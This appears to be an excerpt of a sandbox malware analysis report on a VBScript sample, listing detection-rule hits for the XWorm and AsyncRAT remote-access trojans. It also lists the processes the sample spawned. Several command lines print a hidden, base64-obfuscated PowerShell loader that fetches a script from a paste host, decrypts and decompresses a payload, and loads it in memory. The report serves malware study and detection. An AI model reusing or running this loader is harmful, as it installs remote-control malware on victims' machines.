                Source: 28.2.powershell.exe.206008ed970.0.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 28.2.powershell.exe.206008ed970.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7ccde7168.12.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 23.2.powershell.exe.2cc07141480.1.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 23.2.powershell.exe.2cc07141480.1.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 18.2.powershell.exe.1e1aa248728.8.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 18.2.powershell.exe.1e1aa248728.8.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 5.2.powershell.exe.1d3133b65d0.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 23.2.powershell.exe.2cc07127e40.3.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 23.2.powershell.exe.2cc07127e40.3.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 28.2.powershell.exe.206008f65a0.7.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 28.2.powershell.exe.206008f65a0.7.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 28.2.powershell.exe.20601dfa830.9.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 28.2.powershell.exe.20601dfa830.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 23.2.powershell.exe.2cc0714a0b0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 28.2.powershell.exe.20601dfa830.9.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 28.2.powershell.exe.20601dfa830.9.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 23.2.powershell.exe.2cc0714a0b0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 11.2.powershell.exe.1d7ce2d5060.3.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7ce2d5060.3.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 11.2.powershell.exe.1d7ccde7168.12.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7ccde7168.12.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 28.2.powershell.exe.20601de4450.13.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 28.2.powershell.exe.20601de4450.13.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7ce2d5060.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 11.2.powershell.exe.1d7e4bb0000.16.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7e4bb0000.16.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 11.2.powershell.exe.1d7ce2eb440.2.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7ce2eb440.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 18.2.powershell.exe.1e1aa261880.9.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 18.2.powershell.exe.1e1aa261880.9.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 28.2.powershell.exe.206008f65a0.7.raw.unpack, type: UNPACKEDPE | Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings | Author: Sekoia.io
                Source: 28.2.powershell.exe.206008f65a0.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 5.2.powershell.exe.1d3133ad9a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 18.2.powershell.exe.1e1aa261880.9.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 18.2.powershell.exe.1e1aa261880.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 11.2.powershell.exe.1d7ccdde538.9.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7ccdde538.9.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 28.2.powershell.exe.206008ed970.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 28.2.powershell.exe.206008ed970.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 18.2.powershell.exe.1e1aa248728.8.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 18.2.powershell.exe.1e1aa248728.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 5.2.powershell.exe.1d3133ad9a0.3.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 5.2.powershell.exe.1d3133ad9a0.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 11.2.powershell.exe.1d7ce2eb440.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7ce2eb440.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 11.2.powershell.exe.1d7e4bb0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 11.2.powershell.exe.1d7e4bb0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 5.2.powershell.exe.1d3133975c0.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 5.2.powershell.exe.1d3133975c0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 23.2.powershell.exe.2cc07141480.1.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 23.2.powershell.exe.2cc07141480.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 23.2.powershell.exe.2cc07127e40.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 23.2.powershell.exe.2cc07127e40.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000012.00000002.2074612069.000001E1AA212000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000001C.00000002.2323673539.00000206008C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000001C.00000002.2323673539.0000020601DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000001C.00000002.2323673539.0000020601DC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000005.00000002.2325412269.000001D313377000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000B.00000002.1945403188.000001D7CE2B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000B.00000002.1945403188.000001D7CE2E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000005.00000002.2325412269.000001D3133AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                Source: 0000000B.00000002.1969459274.000001D7E4BB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000012.00000002.2074612069.000001E1AA261000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000017.00000002.2248750195.000002CC070F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000000B.00000002.1945403188.000001D7CCDB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0000001C.00000002.2323673539.0000020601DE4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000017.00000002.2248750195.000002CC07141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7456, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7900, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3152, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7312, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 2720, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\shutdown.exe shutdown.exe -L
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\bYKR19crJ6p8904.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDb
i5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBrZGF1dCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnTWRnU20vQURpdmU2bWFpR0IvNHVLY1NuNCt5cTlMcDNScHRaTkZ4aFBsbz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnUmFncFVZRkg0T1V2L3R0NWowbEdWZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBpbGd5ZSgkcGFyYW1fdmFyKXsJSUVYICckanloaXg9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckYnJlZ3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyR2d3Rzdz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDb
i5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRqeWhpeCwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkdnd0c3cuQ29weVRvKCRicmVndyk7CSR2d3Rzdy5EaXNwb3NlKCk7CSRqeWhpeC5EaXNwb3NlKCk7CSRicmVndy5EaXNwb3NlKCk7CSRicmVndy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHpnd3d3KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyRieWF3aD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGVhYXNzPSRieWF3aC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRlYWFzcy5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGdzZiA9ICRlbnY6VVNFUk5BTUU7JHBndndsID0gJ0M6XFVzZXJzXCcgKyAkZ3NmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkcGd2d2w7JGNtdGt0PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\svchost.exe; File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 5_2_00007FFD9B8B715F
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 5_2_00007FFD9B8BD096
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 5_2_00007FFD9B8C40D6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 5_2_00007FFD9B8BDE42
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 5_2_00007FFD9B976602
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 5_2_00007FFD9BB805CD
                Source: Xclient.vbs; Initial sample: Strings found which are bigger than 50
                Source: unknown; Driver loaded: C:\Windows\System32\cdd.dll
                Source: C:\Windows\System32\cmd.exe; Process created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exe; Process created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exe; Process created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exe; Process created: Commandline size = 3663
                Source: C:\Windows\System32\cmd.exe; Process created: Commandline size = 3663
                Source: 5.2.powershell.exe.1d3133b65d0.8.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 5.2.powershell.exe.1d3133b65d0.8.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 18.2.powershell.exe.1e1aa26a4b0.1.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 18.2.powershell.exe.1e1aa26a4b0.1.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 23.2.powershell.exe.2cc0714a0b0.4.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 23.2.powershell.exe.2cc0714a0b0.4.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 11.2.powershell.exe.1d7ccdde538.9.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 18.2.powershell.exe.1e1aa26a4b0.1.raw.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                Source: 18.2.powershell.exe.1e1aa26a4b0.1.raw.unpack, type: UNPACKEDPE; Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 5.2.powershell.exe.1d3133975c0.0.raw.unpack, type: UNPACKEDPE; Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
